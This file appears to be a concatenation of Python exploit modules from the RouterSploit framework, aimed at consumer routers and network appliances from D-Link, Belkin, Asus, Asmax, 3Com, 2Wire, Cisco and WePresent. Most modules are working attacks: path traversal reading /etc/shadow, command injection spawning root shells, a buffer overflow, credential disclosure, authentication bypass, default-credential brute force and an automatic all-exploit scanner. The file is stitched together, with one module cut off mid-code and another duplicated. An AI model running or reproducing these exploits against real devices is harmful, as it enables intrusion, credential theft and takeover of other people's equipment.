class Exploit(exploits.Exploit):
"""
Exploit implementation for 3Com Intelligent Management Center Path Traversal vulnerability.
If the target is vulnerable it is possible to read file from the filesystem.
"""
__info__ = {
'name':
'3Com IMC Path Traversal',
'description':
'Exploits 3Com Intelligent Management Center path traversal vulnerability. If the target is vulnerable it is possible to read file from the filesystem.',
'authors': [
'Richard Brain', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/12679/',
],
'devices': [
'3Com Intelligent Management Center',
],
}
target = exploits.Option('',
'Target address e.g. http://192.168.1.1',
validators=validators.url) # target address
port = exploits.Option(8080, 'Target port') # default port
filename = exploits.Option('\\windows\\win.ini',
'File to read from the filesystem')
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
url = "{}:{}/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=reportParaExample.xml..\..\..\..\..\..\..\..\..\..{}".format(
self.target, self.port, self.filename)
print_status("Sending paylaod request")
response = http_request(method="GET", url=url)
if response is None:
return
if response.status_code == 200 and len(response.text):
print_success("Exploit success - reading {} file".format(
self.filename))
print_info(response.text)
else:
print_error("Exploit failed - target seems to be not vulnerable")
@mute
def check(self):
url = "{}:{}/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=reportParaExample.xml..\..\..\..\..\..\..\..\..\..\windows\win.ini".format(
self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if response.status_code == 200 and "[fonts]" in response.text:
return True # target is vulnerable
return False # target is not vulnerable
class Exploit(exploits.Exploit):
"""
Run the Forescout project-memoria-detector.
"""
__info__ = {
'name': 'TCP Stack Detect',
'description': '',
'authors': [
'Dimitri Harkovski <s8ddhark[at]stud.uni-saarland.de>',
'Tobias Berdin <s8toberd[at]stud.uni-saarland.de>'
],
'references': [
''
],
'devices': [
'Multi',
],
}
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
port = exploits.Option(80, 'Target port e.g. 80') # target port
def run(self):
if self.check():
print_success("Target is vulnerable")
else:
print_error("Target is not vulnerable")
@mute
def check(self):
if self.target == '':
return False # target has not been set
return project_memoria_detector.run_project_memoria_detector(self.target, int(self.port))
class Exploit(exploits.Exploit):
"""
Exploit implementation for D-Link DPS-W110 Remote Code Execution vulnerability.
If the target is vulnerable, command loop is invoked that allows executing commands on the device.
"""
__info__ = {
'name':
'D-Link DSP-W110 RCE',
'description':
'Module exploits D-Link DSP-W110 Remote Command Execution vulnerability '
'which allows executing command on the operating system level.',
'authors': [
'Peter Adkins <peter.adkins[at]kernelpicnic.net', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references':
['https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'],
'devices': ['D-Link DSP-W110 (Rev A) - v1.05b01']
}
target = exploits.Option('',
'Target address e.g. http://192.168.1.1',
validators=validators.url)
port = exploits.Option(80, 'Target Port', validators=validators.integer)
def run(self):
if self.check():
print_status("Target might be vulnerable - difficult to verify")
print_status("Invoking command loop...")
print_status(
"It is blind command injection, response is not available.")
print_status("Spawn root shell with telnetd -l/bin/sh")
shell(self, architecture="mipsbe")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def execute(self, cmd):
if len(cmd) > 18:
print_error("Command too long. Max is 18 characters.")
return ""
url = "{}:{}/".format(self.target, self.port)
payload = "`{}`".format(cmd)
cookies = {"i": payload}
http_request(method="GET", url=url, cookies=cookies)
return ""
@mute
def check(self):
url = "{}:{}/".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is not None and "Server" in response.headers.keys(
) and "lighttpd/1.4.34" in response.headers['Server']:
return True # target is vulnerable
return False
class Exploit(exploits.Exploit):
"""
D-Link Scanner
"""
__info__ = {
'name':
'D-Link Scanner',
'description':
'Scanner module for D-Link devices',
'author': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
}
target = exploits.Option(
'', 'Target IP address e.g. 192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
rootpath = 'routersploit/modules/'
path = 'exploits/dlink/'
# only py exploit files
modules = [
f.replace(".py", "") for f in listdir(rootpath + path)
if isfile(join(rootpath + path, f)) and f.endswith(".py")
and f != "__init__.py"
]
vulns = []
for module_name in modules:
f = path + module_name
module = imp.load_source('module', rootpath + f + '.py')
exploit = module.Exploit()
exploit.target = self.target
exploit.port = self.port
res = exploit.check()
if res is True:
print_success("{} is vulnerable".format(f))
vulns.append(f)
elif res is False:
print_error("{} is not vulnerable".format(f))
else:
print_status("{} could not be verified".format(f))
print
if len(vulns):
print_success("Device is vulnerable!")
for v in vulns:
print " - {}".format(v)
else:
print_error("Device is not vulnerable to any exploits!")
print
def check(self):
print_error("Check method is not available")
class Exploit(exploits.Exploit):
"""
Search if encryption is enabled in this telnet server.
Some systems implemented encryption incorrectly, so we look if an attack would be possible.
"""
__info__ = {
'name': 'Telnet Encryption',
'description': '',
'authors': [
'Dimitri Harkovski <s8ddhark[at]stud.uni-saarland.de>',
'Tobias Berdin <s8toberd[at]stud.uni-saarland.de>'
],
'references': [
''
],
'devices': [
'Multi',
],
}
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
port = exploits.Option(2000, 'Port that runs the telnet service') # target port
user = exploits.Option('root', 'User for the telnet connection') # telnet user
def run(self):
if self.check():
print_success("Target is vulnerable")
else:
print_error("Target is not vulnerable")
@mute
def check(self):
return attack_telnet(self.target, self.port)
class Exploit(exploits.Exploit):
"""
Module perform dictionary attack with default credentials against FTP service.
If valid credentials are found, they are displayed to the user.
"""
__info__ = {
'name':
'FTP Default Creds',
'author': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
target = exploits.Option('', 'Target IP address')
port = exploits.Option(21, 'Target port')
threads = exploits.Option(8, 'Numbers of threads')
defaults = exploits.Option(
wordlists.defaults,
'User:Pass pair or file with default credentials (file://)')
verbosity = exploits.Option('yes', 'Display authentication attempts')
credentials = []
def run(self):
self.credentials = []
ftp = ftplib.FTP()
try:
ftp.connect(self.target, port=int(self.port), timeout=10)
except socket.error, socket.timeout:
print_error("Connection error: %s:%s" %
(self.target, str(self.port)))
ftp.close()
return
except:
class Exploit(exploits.Exploit):
"""
Exploit implementation for 3Com 3CRADSL72 Information Disclosure vulnerability.
If the target is vulnerable it allows to read sensitive information.
"""
__info__ = {
'name':
'3Com 3CRADSL72 Info Disclosure',
'description':
'Exploits 3Com 3CRADSL72 information disclosure vulnerability that allows to fetch credentials for SQL sa account',
'authors': [
'Karb0nOxyde <karb0noxyde[at]gmail.com>', # vulnerability discovery
'Ivan Casado Ruiz <casadoi[at]yahoo.co.uk>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://lostmon.blogspot.com/2005/04/3com-adsl-11g-cradsl72-router.html',
'http://www.securityfocus.com/bid/11408/exploit',
],
'devices': [
'3Com 3CRADSL72',
],
}
target = exploits.Option('',
'Target address e.g. http://192.168.1.1',
validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
resources = ["/app_sta.stm", "/cgi-bin/config.bin"]
def run(self):
for resource in self.resources:
url = "{}:{}{}".format(self.target, self.port, resource)
print_status("Sending request to download sensitive information")
response = http_request(method="GET", url=url)
if response is None:
return
if response.status_code == 200 and "password" in response.text:
print_success("Exploit success")
print_status("Reading {} file".format(resource))
print_info(response.text)
else:
print_error("Exploit failed - could not retrieve response")
@mute
def check(self):
for resource in self.resources:
url = "{}:{}{}".format(self.target, self.port, resource)
response = http_request(method="GET", url=url)
if response is None:
continue
if response.status_code == 200 and "password" in response.text:
return True
return False # target not vulnerable
class Exploit(exploits.Exploit):
"""
Exploit implementation for Asmax AR 804 Remote Code Execution vulnerability.
If the target is vulnerable, command loop is invoked that allows executing commands with root privileges.
"""
__info__ = {
'name':
'Asmax AR 804 RCE',
'authors': [
'Michal Sajdak <*****@*****.**>', # vulnerability discovery
'Marcin Bury <*****@*****.**>', # routersploit module
],
'description':
'Module exploits Asmax AR 804 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.',
'references': [
'http://www.securitum.pl/dh/asmax-ar-804-gu-compromise',
'https://www.exploit-db.com/exploits/8846/',
],
'targets': [
'Asmax AR 804 gu',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
port = exploits.Option(80, 'Target Port')
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
else:
print_error("Target is not vulnerable")
def command_loop(self):
while 1:
cmd = raw_input("cmd > ")
print self.execute(cmd)
def execute(self, cmd):
url = sanitize_url("{}:{}/cgi-bin/script?system%20{}".format(
self.target, self.port, cmd))
response = http_request(method="GET", url=url)
if response is None:
return ""
return response.text
@mute
def check(self):
mark = random_text(32)
cmd = "echo {}".format(mark)
response = self.execute(cmd)
if mark in response:
return True
return False
class Exploit(exploits.Exploit):
"""
Exploit implementation for Belkin N750 Remote Code Execution vulnerability.
If the target is vulnerable, command prompt is invoked.
"""
__info__ = {
'name': 'Belkin N750 RCE',
'description': 'Module exploits Belkin N750 Remote Code Execution vulnerability which allows executing commands on operation system level.',
'authors': [
'Marco Vaz <mv[at]integrity.pt>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1635',
'https://www.exploit-db.com/exploits/35184/',
'https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/',
],
'targets': [
'Belkin N750',
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
port = exploits.Option(80, 'Target Port')
def run(self):
if self.check() is True:
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
else:
print_error("Target is not vulnerable")
def command_loop(self):
while 1:
cmd = raw_input("cmd > ")
print self.execute(cmd)
def execute(self, cmd):
url = sanitize_url("{}:{}/login.cgi.php".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = "GO=&jump=" + "A" * 1379 + ";{};&ps=\n\n".format(cmd)
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
return ""
return response.text
@mute
def check(self):
mark = random_text(32)
cmd = "echo {}".format(mark)
response = self.execute(cmd)
if mark in response:
return True # target vulnerable
return False # target is not vulnerable
class Exploit(exploits.Exploit):
"""
Exploit implementation for Belkin N150 Path Traversal vulnerability.
If the target is vulnerable, content of the specified file is returned.
"""
__info__ = {
'name':
'Belkin N150 Path Traversal',
'description':
'Module exploits Belkin N150 Path Traversal vulnerability which allows to read any file on the system.',
'authors': [
'Aditya Lad', # vulnerability discovery
'Rahul Pratap Singh', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/38488/',
'http://www.belkin.com/us/support-article?articleNum=109400',
'http://www.kb.cert.org/vuls/id/774788',
],
'targets': [
'Belkin N150 1.00.07',
'Belkin N150 1.00.08',
'Belkin N150 1.00.09',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
port = exploits.Option(80, 'Target Port')
filename = exploits.Option('/etc/shadow', 'File to read')
def run(self):
url = sanitize_url(
"{}:{}/cgi-bin/webproc?getpage={}&var:page=deviceinfo".format(
self.target, self.port, self.filename))
response = http_request(method="GET", url=url)
if response is None:
return
if len(response.text):
print_success("Success! File: %s" % self.filename)
print response.text
else:
print_error("Exploit failed")
@mute
def check(self):
url = sanitize_url(
"{}:{}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo".
format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if "root:" in response.text:
return True # target vulnerable
return False # target is not vulnerable
class Exploit(exploits.Exploit):
""" Exploit template. """
__info__ = {
'name': '',
'authors': [
'', # vulnerability discovery
'', # routersploit module
],
'description': '',
'references': [
'',
],
'devices': [
'',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
def run(self):
pass
@mute
def check(self):
pass
class Exploit(exploits.Exploit):
"""
Exploit implementation for Asus RT-N16 Password Disclosure vulnerability.
If the target is vulnerable it allows to read credentials for administrator.
"""
__info__ = {
'name': 'Asus RT-N16 Password Disclosure',
'description': 'Module exploits password disclosure vulnerability in Asus RT-N16 devices that allows to fetch credentials for the device.',
'authors': [
'Harry Sintonen', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://sintonen.fi/advisories/asus-router-auth-bypass.txt'
],
'devices': [
'ASUS RT-N10U, firmware 3.0.0.4.374_168',
'ASUS RT-N56U, firmware 3.0.0.4.374_979',
'ASUS DSL-N55U, firmware 3.0.0.4.374_1397',
'ASUS RT-AC66U, firmware 3.0.0.4.374_2050',
'ASUS RT-N15U, firmware 3.0.0.4.374_16',
'ASUS RT-N53, firmware 3.0.0.4.374_311',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(8080, 'Target port') # default port
def run(self):
url = sanitize_url("{}:{}/error_page.htm".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return
creds = re.findall("if\('1' == '0' \|\| '(.+?)' == 'admin'\)", response.text)
if len(creds):
c = [("admin", creds[0])]
print_success("Credentials found!")
headers = ("Login", "Password")
print_table(headers, *c)
else:
print_error("Credentials could not be found")
@mute
def check(self):
url = sanitize_url("{}:{}/error_page.htm".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
creds = re.findall("if\('1' == '0' \|\| '(.+?)' == 'admin'\)", response.text)
if len(creds):
return True # target is vulnerable
return False # target is not vulnerable
class Exploit(exploits.Exploit):
"""
Exploit implementation for D-Link DIR-300, DIR-320, DIR-615 Authentication Bypass vulnerability.
If the target is vulnerable link to bypass authentication will be provided"
"""
__info__ = {
'name': 'D-Link DIR-300 & DIR-320 & DIR-615 Auth Bypass',
'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615 revD devices. It is possible to access administration panel without providing password.',
'authors': [
'Craig Heffner', # vulnerability discovery
'Karol Celin', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf',
],
'devices': [
'D-Link DIR-300',
'D-Link DIR-600',
'D-Link DIR-615 revD',
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
print_success("Target is vulnerable")
print "\nYou need to add NO_NEED_AUTH=1&AUTH_GROUP=0 to query string for every action."
print "\nExamples:"
print "{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port)
print "{}:{}/bsc_wlan.php?NO_NEED_AUTH=1&AUTH_GROUP=0\n".format(self.target, self.port)
else:
print_error("Target seems to be not vulnerable")
@mute
def check(self):
# check if it is valid target
url = "{}:{}/bsc_lan.php".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if '<form name="frm" id="frm" method="post" action="login.php">' not in response.text:
return False # target is not vulnerable
# checking if authentication can be baypassed
url = "{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if '<form name="frm" id="frm" method="post" action="login.php">' not in response.text:
return True # target is vulnerable
return False # target is not vulnerable
class Exploit(exploits.Exploit):
"""
Exploit implementation for WePresent WiPG-1000 Command Injection vulnerability.
If the target is vulnerable, it is possible to execute commands on operating system level.
"""
__info__ = {
'name':
'WePresent WiPG-1000 RCE',
'description':
'Module exploits WePresent WiPG-1000 Command Injection vulnerability which allows '
'executing commands on operating system level.',
'authors': [
'Matthias Brun', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.redguard.ch/advisories/wepresent-wipg1000.txt',
],
'devices': [
'WePresent WiPG-1000 <=2.0.0.7',
],
}
target = exploits.Option('',
'Target address e.g. http://192.168.1.1',
validators=validators.url)
port = exploits.Option(80, 'Target Port', validators=validators.integer)
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
print_status(
"This is blind command injection, response is not available")
shell(self,
architecture="mipsbe",
binary="netcat",
shell="/bin/sh")
else:
print_error("Exploit failed - exploit seems to be not vulnerable")
def execute(self, cmd):
""" callback used by shell functionality """
payload = ";{};".format(cmd)
url = "{}:{}/cgi-bin/rdfs.cgi".format(self.target, self.port)
data = {"Client": payload, "Download": "Download"}
http_request(method="POST", url=url, data=data)
return ""
@mute
def check(self):
url = "{}:{}/cgi-bin/rdfs.cgi".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is not None and "Follow administrator instructions to enter the complete path" in response.text:
return True # target vulnerable
return False # target is not vulnerable
class Exploit(exploits.Exploit):
"""
Exploit implementation for 2Wire Gateway devices Authentication Bypass vulnerability.
If the target is vulnerable link to bypass authentication is provided"
"""
__info__ = {
'name': '2Wire Gateway Auth Bypass',
'description': 'Module exploits 2Wire Gateway authentication bypass vulnerability. '
'If the target is vulnerable link to bypass authentication is provided.',
'authors': [
'bugz', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/9459/',
],
'devices': [
'2Wire 2701HGV-W',
'2Wire 3800HGV-B',
'2Wire 3801HGV',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
print_success("Target is vulnerable")
print_info("\nUse your browser:")
print_info("{}:{}/xslt".format(self.target, self.port))
else:
print_error("Target seems to be not vulnerable")
@mute
def check(self):
mark = '<form name="pagepost" method="post" action="/xslt?PAGE=WRA01_POST&NEXTPAGE=WRA01_POST" id="pagepost">'
# checking if the target is valid
url = "{}:{}/".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if mark not in response.text:
return False # target is not vulnerable
# checking if authentication can be bypassed
url = "{}:{}/xslt".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if mark not in response.text:
return True # target vulnerable
return False # target not vulnerable
class Exploit(exploits.Exploit):
"""
Exploit implementation for Movistar ADSL Router BHS_RTA Path Traversal vulnerability.
If the target is vulnerable, content of the specified file is returned.
"""
__info__ = {
'name':
'Movistar ADSL Router BHS_RTA Path Traversal',
'description':
'Module exploits Movistar ADSL Router BHS_RTA Path Traversal vulnerability which allows to read any file on the system.',
'authors': [
'Todor Donev <todor.donev[at]gmail.com>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/40734/',
],
'devices': [
'Movistar ADSL Router BHS_RTA',
],
}
target = exploits.Option('',
'Target address e.g. http://192.168.1.1',
validators=validators.url)
port = exploits.Option(80, 'Target Port')
filename = exploits.Option('/etc/shadow', 'File to read')
def run(self):
if self.check():
url = "{}:{}/cgi-bin/webproc?getpage={}&var:language=es_es&var:page=".format(
self.target, self.port, self.filename)
response = http_request(method="GET", url=url)
if response is None:
return
if response.status_code == 200 and len(response.text):
print_success("Success! File: %s" % self.filename)
print response.text
else:
print_error("Exploit failed")
else:
print_error("Device seems to be not vulnerable")
@mute
def check(self):
url = "{}:{}/cgi-bin/webproc?getpage=/etc/passwd&var:language=es_es&var:page=".format(
self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if "root:" in response.text:
return True # target vulnerable
return False # target is not vulnerable
class Exploit(exploits.Exploit):
"""
Exploit implementation for Asmax AR 804 Remote Code Execution vulnerability.
If the target is vulnerable, command loop is invoked that allows executing commands with root privileges.
"""
__info__ = {
'name': 'Asmax AR 804 RCE',
'authors': [
'Michal Sajdak <michal.sajdak[at]securitum.com>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'description': 'Module exploits Asmax AR 804 Remote Code Execution vulnerability which '
'allows executing command on operating system level with root privileges.',
'references': [
'http://www.securitum.pl/dh/asmax-ar-804-gu-compromise',
'https://www.exploit-db.com/exploits/8846/',
],
'devices': [
'Asmax AR 804 gu',
],
}
target = exploits.Option('', 'Target URL address e.g. http://192.168.1.1', validators=validators.url) # target url address
port = exploits.Option(80, 'Target HTTP port', validators=validators.integer) # target http port
def run(self):
print_status("Checking if target is vulnerable")
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mips")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def execute(self, cmd):
""" callback used by shell functionality """
url = "{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd)
response = http_request(method="GET", url=url)
if response is None:
return ""
return response.text
@mute
def check(self):
cmd = "cat /etc/passwd"
url = "{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if response.status_code == 200 and "root:" in response.text:
return True # target is vulnerable
return False # target is not vulnerable
class Exploit(exploits.Exploit):
"""
Exploit implementation for Belkin G and N150 Password MD5 Disclosure vulnerability.
If the target is vulnerable, password in MD5 format is returned.
"""
__info__ = {
'name': 'Belkin G & N150 Password Disclosure',
'description': 'Module exploits Belkin G and N150 Password MD5 Disclosure vulnerability which allows fetching administration\'s password in md5 format',
'authors': [
'Aodrulez <f3arm3d3ar[at]gmail.com>', # vulnerability discovery
'Avinash Tangirala', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2765',
'https://www.exploit-db.com/exploits/17349/',
],
'devices': [
'Belkin G',
'Belkin N150',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
port = exploits.Option(80, 'Target Port')
def run(self):
url = sanitize_url("{}:{}/login.stm".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return
val = re.findall('password = "******"', response.text)
if len(val):
print_success("Exploit success")
data = [('admin', val[0])]
headers = ("Login", "MD5 Password")
print_table(headers, *data)
else:
print_error("Exploit failed. Device seems to be not vulnerable.")
@mute
def check(self):
url = sanitize_url("{}:{}/login.stm".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
val = re.findall('password = "******"', response.text)
if len(val):
return True # target vulnerable
return False # target is not vulnerable
class Exploit(exploits.Exploit):
"""
Exploit implementation for Path Traversal vulnerability in Cisco Video Surveillance Operations Manager 6.3.2 devices.
If the target is vulnerable, it allows to read files from the filesystem.
"""
__info__ = {
'name':
'Cisco Unified Multi Path Traversal',
'description':
'Module exploits path traversal vulnerability in Cisco Video Surveillance Operations Manager 6.3.2 devices.'
'If the target is vulnerable it allows to read files from the filesystem.',
'authors': [
'b.saleh', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/38389/',
],
'devices': [
'Cisco Video Surveillance Operations Manager 6.3.2',
],
}
target = exploits.Option('',
'Target address e.g. http://192.168.1.1',
validators=validators.url)
port = exploits.Option(80, 'Target Port')
filename = exploits.Option('/etc/passwd',
'File to read from the filesystem')
def run(self):
url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../..{}".format(
self.target, self.port, self.filename)
response = http_request(method="GET", url=url)
if response is None:
return
if response.status_code == 200 and len(response.text):
print_success("Exploit success")
print_status("Reading file: {}".format(self.filename))
print_info(response.text)
else:
print_error("Exploit failed - could not read file")
@mute
def check(self):
url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd".format(
self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if response.status_code == 200 and len(response.text):
return True # target is vulnerable
return False # target is not vulnerable
class Exploit(exploits.Exploit):
"""
Check what SSH authentication methods are available.
"""
__info__ = {
'name':
'SSH Auth Methods',
'description':
'',
'authors': [
'Dimitri Harkovski <s8ddhark[at]stud.uni-saarland.de>',
'Tobias Berdin <s8toberd[at]stud.uni-saarland.de>'
],
'references': [''],
'devices': [
'Multi',
],
}
target = exploits.Option(
'', 'Target address e.g. 192.168.1.1') # target address
port = exploits.Option(22, 'Target port e.g. 22') # target port
def run(self):
if self.check():
print_success("Target is vulnerable")
else:
print_error("Target is not vulnerable")
@mute
def check(self):
if self.target == '':
return False # target has not been set
try:
t = paramiko.Transport((self.target, int(self.port)))
except:
return False
methods = []
try:
t.connect()
except paramiko.ssh_exception.SSHException:
t.close()
return False # no ssh connection point can be found
try:
t.auth_none('')
except paramiko.BadAuthenticationType as err:
methods = err.allowed_types
finally:
t.close()
print('Supported method: %s' % methods)
if u'publickey' not in methods:
return True # public key authentication is not enabled -> target connection only possible with password
return False
class Exploit(exploits.Exploit):
"""
Exploit implementation for D-Link DVG-N5402SP path traversal vulnerability.
If the target is vulnerable it allows to read files from the device."
"""
__info__ = {
'name': 'D-Link DVG-N5402SP Path Traversal',
'description': 'Module exploits D-Link DVG-N5402SP path traversal vulnerability, which allows reading files form the device',
'authors': [
'Karn Ganeshen', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/39409/',
'http://ipositivesecurity.blogspot.com/2016/02/dlink-dvgn5402sp-multiple-vuln.html',
],
'devices': [
'D-Link DVG-N5402SP',
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(8080, 'Target port') # default port
filename = exploits.Option('/etc/shadow', 'File to read') # file to read
def run(self):
# address and parameters
url = "{}:{}/cgi-bin/webproc".format(self.target, self.port)
data = {"getpage": "html/index.html","*errorpage*": "../../../../../../../../../../..{}".format(self.filename), "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "******", "%3Apassword": "******","%3Aaction": "login","%3Asessionid": "abcdefgh"}
# connection
response = http_request(method="POST", url=url, data=data)
if response is None:
return
if response.status_code == 200:
print_success("Exploit success")
print_status("File: {}".format(self.filename))
print response.text
else:
print_error("Exploit failed")
@mute
def check(self):
# address and parameters
url = "{}:{}/cgi-bin/webproc".format(self.target, self.port)
data = {"getpage": "html/index.html","*errorpage*": "../../../../../../../../../../../etc/shadow", "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "******", "%3Apassword": "******","%3Aaction": "login","%3Asessionid": "abcdefgh"}
# connection
response = http_request(method="POST", url=url, data=data)
if response is None:
return False # target is not vulnerable
if "root" in response.text:
return True # target vulnerable
return False # target not vulnerable
class Exploit(exploits.Exploit):
"""
Exploit implementation for D-Link DIR-300, DIR-320, DIR-600, DIR-615 Information Disclosure vulnerability.
If the target is vulnerable it allows to read credentials for administrator."
"""
__info__ = {
'name': 'D-Link DIR-300 & DIR-320 & DIR-600 & DIR-615 Info Disclosure',
'description': 'Module explois information disclosure vulnerability in D-Link DIR-300, DIR-320, DIR-600, DIR-615 devices. It is possible to retrieve sensitive information such as credentials.',
'authors': [
'tytusromekiatomek <tytusromekiatomek[at]inbox.com>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
'Aleksandr Mikhaylov <chelaxe[at]gmail.com>', # routersploit module
],
'references': [
'http://seclists.org/bugtraq/2013/Dec/11'
],
'devices': [
'D-Link DIR-300 (all)',
'D-Link DIR-320 (all)',
'D-Link DIR-600 (all)',
'D-Link DIR-615 (fw 4.0)',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
url = "{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return
creds = re.findall("\n\t\t\t(.+?):(.+?)\n\n\t\t\t", response.text)
if len(creds):
print_success("Credentials found!")
headers = ("Login", "Password")
print_table(headers, *creds)
else:
print_error("Credentials could not be found")
@mute
def check(self):
url = "{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
creds = re.findall("\n\t\t\t(.+?):(.+?)\n\n\t\t\t", response.text)
if len(creds):
return True # target is vulnerable
return False # target is not vulnerable
class Exploit(exploits.Exploit):
"""
Scanner implementation for all vulnerabilities.
"""
__info__ = {
'name': 'AutoPwn',
'description': 'Scanner module for all vulnerabilities.',
'authors': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': ('', ),
'devices': ('Multi', ),
}
vendor = ''
target = exploits.Option(
'', 'Target IP address e.g. 192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
threads = exploits.Option(8, "Number of threads")
def __init__(self):
self.vulnerabilities = []
self._exploits_directory = path.join(utils.EXPLOITS_DIR, self.vendor)
def run(self):
self.vulnerabilities = []
with threads.ThreadPoolExecutor(self.threads) as executor:
for exploit in utils.iter_modules(self._exploits_directory):
executor.submit(self.target_function, exploit)
print_info()
if self.vulnerabilities:
print_success("Device is vulnerable!")
for v in self.vulnerabilities:
print_info(" - {}".format(v))
print_info()
else:
print_error("Device is not vulnerable to any exploits!\n")
def check(self):
raise NotImplementedError("Check method is not available")
def target_function(self, exploit):
exploit = exploit()
exploit.target = self.target
exploit.port = self.port
